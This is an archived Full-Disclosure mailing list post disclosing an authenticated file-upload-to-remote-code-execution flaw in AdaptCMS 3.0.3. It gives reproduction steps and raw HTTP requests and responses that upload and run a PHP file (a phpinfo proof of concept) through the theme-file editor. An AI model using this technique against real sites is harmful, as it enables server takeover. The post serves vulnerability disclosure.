lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CAF2Wu1bsds7qvHjT5FO5LUFJdHish3mKhd8n1J19xKWt_8dgug@mail.gmail.com>
Date: Sun, 1 Jun 2025 16:05:53 +0100
From: Andrey Stoykov <mwebsec@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Authenticated File Upload to RCE - adaptcmsv3.0.3

# Exploit Title: Authenticated File Upload to RCE - adaptcmsv3.0.3
# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/


Authenticated File Upload to RCE #1:

Steps to Reproduce:

1. Login as admin user and visit "System" > "Appearance" > "Themes" >
"Default" > "Theme Files" and choose "Add New File"
2. Select "Add File"
3. In the "File Contents" add the following payload "<?php phpinfo(); ?>"
4. Choose "File Extension" to be "php" and set "Folder Location" to "Images"
5. Upon uploading the file it would be available under the "img" directory


// HTTP POST request

POST /adaptcms/admin/themes/asset_add/Default HTTP/1.1
Host: 192.168.58.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0)
Gecko/20100101 Firefox/140.0
[...]


[...]
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][filename]"; filename=""
Content-Type: application/octet-stream


------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][content]"

<?php phpinfo(); ?>
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][file_extension]"

php
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][file_name]"

test
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][folder]"

img/
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][theme]"
[...]


// HTTP Response

HTTP/1.1 302 Found
Date: Fri, 30 May 2025 16:06:57 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev
Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Location: http://192.168.58.131/adaptcms/admin/themes/edit/Default#assets
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


// HTTP Request triggering the webshell

GET /adaptcms/app/webroot/img/test.php HTTP/1.1
Host: 192.168.58.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0)
Gecko/20100101 Firefox/140.0
[...]


// HTTP Response triggering the webshell

HTTP/1.1 200 OK
Date: Fri, 30 May 2025 16:15:36 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev
Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 102019

[...]
<h1 class="p">PHP Version 5.6.40</h1>
</td></tr>
</table>
<table>
<tr><td class="e">System </td><td class="v">Linux debian 6.1.0-32-amd64 #1
SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64 </td></tr>
<tr>
[...]
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists